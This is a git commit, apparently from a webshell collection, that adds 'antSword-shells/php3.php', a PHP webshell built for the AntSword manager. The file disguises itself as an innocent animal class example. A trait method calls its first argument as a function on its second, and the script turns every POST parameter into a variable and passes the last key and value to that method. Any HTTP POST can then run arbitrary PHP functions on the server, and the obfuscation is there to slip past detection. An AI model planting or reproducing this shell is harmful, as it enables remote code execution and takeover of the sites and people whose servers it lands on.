add php3.php

from : https://xz.aliyun.com/t/9218
This commit is contained in:
tennc 2021-08-15 16:15:40 +08:00 committed by GitHub
parent 45260b3568
commit 2c42c91689
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

46
antSword-shells/php3.php Normal file
View file

@ -0,0 +1,46 @@
<?php
trait Dog
{
public $name="dog";
public function drive()
{
echo "This is dog drive";
}
public function eat($a, $b)
{
$a($b);
}
}
class Animal
{
public function drive()
{
echo "This is animal drive";
}
public function eat()
{
echo "This is animal eat";
}
}
class Cat extends Animal
{
use Dog;
public function drive()
{
echo "This is cat drive";
}
}
foreach (array('_POST') as $_request) {
foreach ($$_request as $_key=>$_value) {
$$_key= $_value;
}
}
$cat = new Cat();
$cat->eat($_key, $_value);